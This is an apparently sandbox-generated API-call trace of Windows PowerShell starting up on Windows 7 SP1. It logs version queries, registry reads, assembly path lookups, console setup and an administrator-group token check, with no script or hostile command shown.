	[0447.646] lstrcpyW (in: lpString1=0x4031a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0447.646] CoTaskMemFree (pv=0x4031a0) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59da4, puLen=0x24daf0) returned 1
	[0447.646] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.646] CoTaskMemAlloc (cb=0x44) returned 0x399900
	[0447.646] lstrcpyW (in: lpString1=0x399900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.646] CoTaskMemFree (pv=0x399900) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59e08, puLen=0x24daf0) returned 1
	[0447.646] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0447.646] CoTaskMemAlloc (cb=0x58) returned 0x3b6e60
	[0447.646] lstrcpyW (in: lpString1=0x3b6e60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0447.646] CoTaskMemFree (pv=0x3b6e60) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59e84, puLen=0x24daf0) returned 1
	[0447.646] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.646] CoTaskMemAlloc (cb=0x20) returned 0x465c80
	[0447.646] lstrcpyW (in: lpString1=0x465c80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.646] CoTaskMemFree (pv=0x465c80) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59b2c, puLen=0x24daf0) returned 1
	[0447.646] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0447.646] CoTaskMemAlloc (cb=0x66) returned 0x463820
	[0447.646] lstrcpyW (in: lpString1=0x463820, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0447.646] CoTaskMemFree (pv=0x463820) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x0, puLen=0x24daf0) returned 0
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x0, puLen=0x24daf0) returned 0
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x0, puLen=0x24daf0) returned 0
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dac8, puLen=0x24dac0 | out: lplpBuffer=0x24dac8*=0x2d59ad4, puLen=0x24dac0) returned 1
	[0447.646] CoTaskMemAlloc (cb=0x204) returned 0x41caa0
	[0447.646] VerLanguageNameW (in: wLang=0x0, szLang=0x41caa0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0447.646] CoTaskMemFree (pv=0x41caa0) 
	[0447.646] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\", lplpBuffer=0x24db18, puLen=0x24db10 | out: lplpBuffer=0x24db18*=0x2d59a60, puLen=0x24db10) returned 1
	[0447.654] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0447.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.654] CoTaskMemFree (pv=0x41caa0) 
	[0447.658] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0447.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.658] CoTaskMemFree (pv=0x41caa0) 
	[0447.662] lstrlenW (lpString="䅁") returned 1
	[0447.671] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d9e8 | out: phkResult=0x24d9e8*=0x2ec) returned 0x0
	[0447.672] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d9d8 | out: phkResult=0x24d9d8*=0x2f0) returned 0x0
	[0447.672] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24da68 | out: phkResult=0x24da68*=0x2f4) returned 0x0
	[0447.676] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d9ac, lpData=0x0, lpcbData=0x24d9a8*=0x0 | out: lpType=0x24d9ac*=0x1, lpData=0x0, lpcbData=0x24d9a8*=0x56) returned 0x0
	[0447.677] CoTaskMemAlloc (cb=0x5a) returned 0x4637b0
	[0447.677] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d97c, lpData=0x4637b0, lpcbData=0x24d978*=0x56 | out: lpType=0x24d97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d978*=0x56) returned 0x0
	[0447.677] CoTaskMemFree (pv=0x4637b0) 
	[0447.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.690] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0448.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.690] CoTaskMemFree (pv=0x41caa0) 
	[0449.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0449.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0450.441] CoTaskMemAlloc (cb=0x104) returned 0x3c6dc0
	[0450.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6dc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.441] CoTaskMemFree (pv=0x3c6dc0) 
	[0450.443] CoTaskMemAlloc (cb=0x104) returned 0x3c6dc0
	[0450.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6dc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.443] CoTaskMemFree (pv=0x3c6dc0) 
	[0450.473] CoTaskMemAlloc (cb=0x104) returned 0x3c6dc0
	[0450.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6dc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.473] CoTaskMemFree (pv=0x3c6dc0) 
	[0450.475] CoTaskMemAlloc (cb=0x104) returned 0x3c6dc0
	[0450.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6dc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.475] CoTaskMemFree (pv=0x3c6dc0) 
	[0450.476] CoTaskMemAlloc (cb=0x104) returned 0x3c6dc0
	[0450.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c6dc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.476] CoTaskMemFree (pv=0x3c6dc0) 
	[0451.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0451.859] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0451.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.859] CoTaskMemFree (pv=0x41caa0) 
	[0451.862] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0451.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0451.862] CoTaskMemFree (pv=0x41caa0) 
	[0452.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0452.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0455.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0455.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0456.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0456.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0458.564] CoTaskMemAlloc (cb=0x104) returned 0x4195b0
	[0458.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4195b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0458.564] CoTaskMemFree (pv=0x4195b0) 
	[0458.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0458.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0458.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0458.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0459.757] SetErrorMode (uMode=0x1) returned 0x1
	[0459.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24d940 | out: lpFileInformation=0x24d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0459.757] SetErrorMode (uMode=0x1) returned 0x1
	[0460.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.298] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0461.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.298] CoTaskMemFree (pv=0x1b91f1c0) 
	[0461.301] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0461.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.301] CoTaskMemFree (pv=0x1b91f0b0) 
	[0461.301] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0461.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.301] CoTaskMemFree (pv=0x1b91f0b0) 
	[0461.304] CoCreateGuid (in: pguid=0x24dd08 | out: pguid=0x24dd08*(Data1=0xfb804d10, Data2=0x44a9, Data3=0x4b90, Data4=([0]=0xa0, [1]=0x2d, [2]=0xfc, [3]=0x8a, [4]=0x6e, [5]=0xfc, [6]=0xb7, [7]=0x8))) returned 0x0
	[0461.308] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0461.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.308] CoTaskMemFree (pv=0x1b91f0b0) 
	[0461.311] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0461.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.311] CoTaskMemFree (pv=0x1b91f0b0) 
	[0461.314] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0461.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0461.314] CoTaskMemFree (pv=0x1b91f0b0) 
	[0461.321] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0461.323] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24d9b0 | out: lpConsoleScreenBufferInfo=0x24d9b0) returned 1
	[0461.330] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0461.749] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24d9b0 | out: lpConsoleScreenBufferInfo=0x24d9b0) returned 1
	[0461.751] GetVersionExW (in: lpVersionInformation=0x24d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0461.753] GetCurrentProcess () returned 0xffffffffffffffff
	[0461.754] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d9d8 | out: TokenHandle=0x24d9d8*=0x198) returned 1
	[0461.758] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d8f8 | out: TokenInformation=0x0, ReturnLength=0x24d8f8) returned 0
	[0461.759] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c7280
	[0461.759] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x3c7280, TokenInformationLength=0x4, ReturnLength=0x24d8f8 | out: TokenInformation=0x3c7280, ReturnLength=0x24d8f8) returned 1
	[0461.760] DuplicateTokenEx (in: hExistingToken=0x198, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24da58 | out: phNewToken=0x24da58*=0x304) returned 1
	[0461.760] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d8f8 | out: TokenInformation=0x0, ReturnLength=0x24d8f8) returned 0
	[0461.760] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c72b0
	[0461.760] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x8, TokenInformation=0x3c72b0, TokenInformationLength=0x4, ReturnLength=0x24d8f8 | out: TokenInformation=0x3c72b0, ReturnLength=0x24d8f8) returned 1
	[0461.760] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2e347e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24da68 | out: IsMember=0x24da68) returned 1
	[0461.760] CloseHandle (hObject=0x304) returned 1
	[0461.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.782] CoTaskMemAlloc (cb=0x804) returned 0x1b921080
	[0461.782] GetConsoleTitleW (in: lpConsoleTitle=0x1b921080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0462.247] CoTaskMemFree (pv=0x1b921080) 
	[0462.278] CoTaskMemAlloc (cb=0x804) returned 0x1b921930
	[0462.278] GetConsoleTitleW (in: lpConsoleTitle=0x1b921930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0462.279] CoTaskMemFree (pv=0x1b921930) 
	[0462.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.281] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
